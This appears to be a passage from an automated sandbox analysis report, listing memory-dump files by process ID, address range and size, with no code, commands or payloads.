                                                                                                              • memory/1728-132-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                Filesize

                                                                                                                88KB

                                                                                                              • memory/1728-129-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1732-196-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1748-147-0x0000000000900000-0x0000000000902000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1748-140-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1756-120-0x00000000004C0000-0x0000000000530000-memory.dmp
                                                                                                                Filesize

                                                                                                                448KB

                                                                                                              • memory/1756-179-0x0000000002930000-0x0000000002A31000-memory.dmp
                                                                                                                Filesize

                                                                                                                1.0MB

                                                                                                              • memory/1756-70-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1756-86-0x0000000010000000-0x0000000010002000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1756-87-0x0000000000700000-0x0000000000801000-memory.dmp
                                                                                                                Filesize

                                                                                                                1.0MB

                                                                                                              • memory/1756-118-0x00000000FF42246C-mapping.dmp
                                                                                                              • memory/1756-119-0x0000000000060000-0x00000000000AB000-memory.dmp
                                                                                                                Filesize

                                                                                                                300KB

                                                                                                              • memory/1756-93-0x0000000000270000-0x00000000002CC000-memory.dmp
                                                                                                                Filesize

                                                                                                                368KB

                                                                                                              • memory/1796-94-0x000000001AFB0000-0x000000001AFB2000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1796-91-0x00000000003C0000-0x00000000003DC000-memory.dmp
                                                                                                                Filesize

                                                                                                                112KB

                                                                                                              • memory/1796-92-0x00000000003E0000-0x00000000003E1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/1796-77-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1796-90-0x00000000003B0000-0x00000000003B1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/1796-88-0x0000000000FD0000-0x0000000000FD1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/1812-253-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1904-60-0x0000000074FB1000-0x0000000074FB3000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1936-246-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1940-173-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1940-104-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1940-174-0x000007FEFB741000-0x000007FEFB743000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1940-107-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/1976-293-0x0000000004702000-0x0000000004703000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/1976-292-0x0000000004700000-0x0000000004701000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2040-296-0x0000000004A10000-0x0000000004A11000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2040-297-0x0000000004A12000-0x0000000004A13000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2144-191-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2156-258-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2160-237-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2184-180-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2200-305-0x0000000000340000-0x0000000000342000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/2200-304-0x0000000000330000-0x0000000000331000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2204-215-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2212-262-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2212-247-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2228-181-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2232-240-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2240-235-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2240-249-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2284-182-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2428-222-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2448-272-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2472-186-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2476-211-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2476-214-0x0000000000320000-0x00000000003BD000-memory.dmp
                                                                                                                Filesize

                                                                                                                628KB

                                                                                                              • memory/2480-269-0x0000000000230000-0x000000000023C000-memory.dmp
                                                                                                                Filesize

                                                                                                                48KB

                                                                                                              • memory/2480-256-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2480-274-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2504-224-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2520-241-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2580-267-0x0000000000402F68-mapping.dmp
                                                                                                              • memory/2580-266-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                                Filesize

                                                                                                                48KB

                                                                                                              • memory/2584-221-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2612-198-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2620-250-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2648-216-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2652-226-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2652-228-0x0000000010000000-0x0000000010002000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/2652-229-0x0000000000410000-0x0000000000511000-memory.dmp
                                                                                                                Filesize

                                                                                                                1.0MB

                                                                                                              • memory/2652-230-0x0000000000540000-0x000000000059C000-memory.dmp
                                                                                                                Filesize

                                                                                                                368KB

                                                                                                              • memory/2732-248-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2732-257-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2752-239-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2792-218-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2796-255-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2808-302-0x0000000004B00000-0x0000000004B01000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2808-303-0x0000000004B02000-0x0000000004B03000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2816-244-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2820-242-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2848-199-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2848-203-0x0000000002120000-0x0000000002122000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/2848-200-0x000007FEF1C50000-0x000007FEF2CE6000-memory.dmp
                                                                                                                Filesize

                                                                                                                16.6MB

                                                                                                              • memory/2884-252-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2892-201-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2924-208-0x0000000000270000-0x0000000000282000-memory.dmp
                                                                                                                Filesize

                                                                                                                72KB

                                                                                                              • memory/2924-202-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2924-207-0x0000000000240000-0x0000000000250000-memory.dmp
                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/2984-259-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2984-263-0x00000000001D0000-0x00000000001E0000-memory.dmp
                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/2984-264-0x0000000000430000-0x0000000000442000-memory.dmp
                                                                                                                Filesize

                                                                                                                72KB

                                                                                                              • memory/3012-205-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3012-210-0x00000000004B0000-0x00000000004B1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/7424-306-0x0000000001060000-0x0000000001061000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/7528-307-0x00000000004C0000-0x00000000004C1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/7788-312-0x0000000000310000-0x00000000003A1000-memory.dmp
                                                                                                                Filesize

                                                                                                                580KB

                                                                                                              • memory/7788-313-0x0000000000400000-0x00000000004AC000-memory.dmp
                                                                                                                Filesize

                                                                                                                688KB

                                                                                                              • memory/7804-309-0x0000000000400000-0x000000000049B000-memory.dmp
                                                                                                                Filesize

                                                                                                                620KB

                                                                                                              • memory/7876-311-0x00000000000C0000-0x000000000012B000-memory.dmp
                                                                                                                Filesize

                                                                                                                428KB

                                                                                                              • memory/7876-310-0x0000000000130000-0x00000000001A4000-memory.dmp
                                                                                                                Filesize

                                                                                                                464KB

                                                                                                              • memory/7968-314-0x00000000000F0000-0x00000000000F7000-memory.dmp
                                                                                                                Filesize

                                                                                                                28KB

                                                                                                              • memory/7968-315-0x00000000000E0000-0x00000000000EC000-memory.dmp
                                                                                                                Filesize

                                                                                                                48KB